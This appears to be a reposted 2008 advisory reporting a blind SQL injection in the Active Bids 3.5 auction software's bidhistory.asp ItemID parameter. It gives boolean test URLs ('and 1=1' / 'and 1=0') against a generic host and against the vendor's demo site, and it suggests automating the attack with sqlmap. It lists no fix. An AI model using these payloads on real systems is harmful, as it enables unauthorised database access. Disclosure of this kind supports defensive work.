Active Bids 3.5 (ItemID) Blind SQL Injection Vulnerability

2008-11-29 23:00:10

[~]Tybe : Remote Blind SQL Injection Vulnerability

[~]Vendor : www.activewebsoftwares.com

[~]Software : Active Bids

[~]author : Mountassif Moad



http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1

http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0

Demo :

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0


# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.